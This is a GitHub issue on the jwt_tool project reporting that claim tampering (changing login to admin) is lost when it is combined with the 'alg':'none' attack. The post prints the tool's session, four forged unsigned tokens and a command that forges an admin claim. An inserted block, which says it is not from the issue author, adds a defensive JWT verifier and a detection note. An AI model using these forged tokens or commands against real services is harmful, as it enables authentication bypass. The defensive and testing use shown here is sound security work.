
tampering is ignored when combined with an attack

Open noraj opened this issue 3 years ago • 1 comment

When combining tamper + an attack, the output token is the original token + the attack; the tampering is ignored.

For example:

$ jwt-tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.OTgxOGE0YWE5Y2UyYTQ5N2FlMzZlZmMwZTIxOGIwOTFhZDdjOTRlYWE4MDFkMWJlOTgwN2E1NTkxMzAzMGMwYw -T -X a

...

Token payload values:
[1] login = "noraj"
[2] iat = 1665254583    ==> TIMESTAMP = 2022-10-08 20:43:03 (UTC)
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[5] *UPDATE TIMESTAMPS*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 1

Current value of login is: noraj
Please enter new value and hit ENTER
> admin 
[1] login = "admin"
[2] iat = 1665254583    ==> TIMESTAMP = 2022-10-08 20:43:03 (UTC)
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[5] *UPDATE TIMESTAMPS*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 0
jwttool_5f095c12269a0436e321cc1cff90399b - EXPLOIT: "alg":"none" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJub25lIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.
jwttool_e67565a408b902fbaee7f0551345ceec - EXPLOIT: "alg":"None" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOb25lIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.
jwttool_09935cb7b6cadff540561326dd3688d1 - EXPLOIT: "alg":"NONE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOT05FIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.
jwttool_e8a178e70ccfaab8ad7ff0ae90add944 - EXPLOIT: "alg":"nOnE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJuT25FIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.

The output token contains user noraj and not admin.

noraj avatar Oct 08 '22 18:10 noraj
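A defender-side counterpart to the "alg":"none" output above, added here as an example and not code from jwt_tool or from the issue author: a minimal JWT verifier that pins the accepted algorithm to a case-sensitive allow-list taken from configuration (never from the token) and checks the HS256 MAC in constant time, run against the four alg:none tokens printed in the post plus a claim-tampered token. `DEMO_KEY`, `sign_hs256` and `demo` are constructed for this example; the key behind the issue's original token is not on the page, so that token would be rejected as a bad signature rather than verified.

```python
import base64
import hashlib
import hmac
import json
from typing import Any, Dict, Optional, Tuple

# Constructed for this example only: the key behind the issue's token is not on the page.
DEMO_KEY = b"example-secret-not-from-the-page"

# Explicit, case-sensitive allow-list. "none", "None", "NONE", "nOnE" and anything else
# the verifier was not configured for are rejected before any signature work happens.
ALLOWED_ALGS = {"HS256"}

# The four tokens jwt_tool printed in the issue for the "alg":"none" variants.
PAGE_ALG_NONE_TOKENS = [
    "eyJhbGciOiJub25lIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.",
    "eyJhbGciOiJOb25lIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.",
    "eyJhbGciOiJOT05FIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.",
    "eyJhbGciOiJuT25FIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.",
]


def b64url_decode(segment: str) -> bytes:
    # JWT segments are unpadded base64url; restore the padding before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def sign_hs256(payload: Dict[str, Any], key: bytes) -> str:
    """Constructed helper: mint a known-good HS256 token for the demonstration."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    mac = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(mac)


def verify(token: str, key: bytes) -> Tuple[str, Optional[Dict[str, Any]]]:
    """Return (status, payload); payload is non-None only when status == "ok".

    The status string doubles as a log field for detection:
    "bad-format", "alg-not-allowed", "bad-signature" or "ok".
    """
    parts = token.split(".")
    if len(parts) != 3:
        return "bad-format", None
    h_b64, p_b64, s_b64 = parts
    try:
        header = json.loads(b64url_decode(h_b64))
    except (ValueError, UnicodeDecodeError):
        return "bad-format", None
    # Exact string match against the configured allow-list, so no case variant of
    # "none" ever reaches an unsigned branch.
    if not isinstance(header, dict) or header.get("alg") not in ALLOWED_ALGS:
        return "alg-not-allowed", None
    expected = hmac.new(key, f"{h_b64}.{p_b64}".encode("ascii"), hashlib.sha256).digest()
    try:
        presented = b64url_decode(s_b64)
    except ValueError:
        return "bad-format", None
    # Constant-time comparison; an empty or wrong-length signature simply fails.
    if not hmac.compare_digest(expected, presented):
        return "bad-signature", None
    try:
        payload = json.loads(b64url_decode(p_b64))
    except (ValueError, UnicodeDecodeError):
        return "bad-format", None
    return "ok", payload


def demo() -> Dict[str, str]:
    """Run the verifier over a known-good token, a claim-tampered copy and the page's tokens."""
    results = {}
    good = sign_hs256({"login": "noraj"}, DEMO_KEY)
    results["good"] = verify(good, DEMO_KEY)[0]
    # Same header and signature, payload swapped to login=admin: the MAC no longer matches.
    h, _, s = good.split(".")
    admin_seg = b64url_encode(b'{"login":"admin"}')
    results["tampered"] = verify(f"{h}.{admin_seg}.{s}", DEMO_KEY)[0]
    for i, tok in enumerate(PAGE_ALG_NONE_TOKENS):
        results[f"alg_none_{i}"] = verify(tok, DEMO_KEY)[0]
    return results


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name:12s} {status}")
```

The point of the allow-list check coming first is that the library never consults the token's `alg` to pick a verification routine; a server that did so is exactly the "unpatched implementation" the tool's message refers to. Logging the status string gives a cheap detection signal: a burst of `alg-not-allowed` from one client is a scan like the one above.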

I know I can use this:

$ jwt-tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.OTgxOGE0YWE5Y2UyYTQ5N2FlMzZlZmMwZTIxOGIwOTFhZDdjOTRlYWE4MDFkMWJlOTgwN2E1NTkxMzAzMGMwYw -X a -pc login -pv admin -I

noraj avatar Oct 08 '22 18:10 noraj